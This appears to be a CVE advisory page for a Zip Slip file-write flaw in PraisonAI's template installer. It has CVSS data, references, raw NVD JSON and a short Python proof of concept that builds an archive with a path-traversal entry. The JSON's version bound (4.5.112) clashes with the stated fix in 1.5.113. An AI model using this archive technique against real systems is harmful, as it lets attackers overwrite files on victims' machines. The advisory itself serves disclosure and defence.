CVE-2026-39307

Description

PraisonAI is a multi-agent teams system. Prior to 1.5.113, The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying if the files within the archive resolve outside of the intended extraction directory. This vulnerability is fixed in 1.5.113.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI < 1.5.113

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import zipfile
import os

# PoC to generate a malicious zip file for Zip Slip vulnerability
# This script creates a zip file containing a file with a path traversal sequence.

def create_malicious_zip(filename):
    with zipfile.ZipFile(filename, 'w') as z:
        # The file name includes "../" to escape the extraction directory
        z.writestr("../../malicious_payload.txt", "This is a malicious file written via Zip Slip.")
    print(f"Created malicious zip file: {filename}")

if __name__ == "__main__":
    create_malicious_zip("exploit_template.zip")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39307
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39307
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39307/
[4] VulDB https://vuldb.com/cve/CVE-2026-39307
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39307", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:36.613", "lastModified": "2026-04-16T01:18:47.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 1.5.113, The PraisonAI templates installation feature is vulnerable to a \"Zip Slip\" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying if the files within the archive resolve outside of the intended extraction directory. This vulnerability is fixed in 1.5.113."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.5.112", "matchCriteriaId": "93136744-3972-4DDD-B569-091065F57C0B"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4ph2-f6pf-79wv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}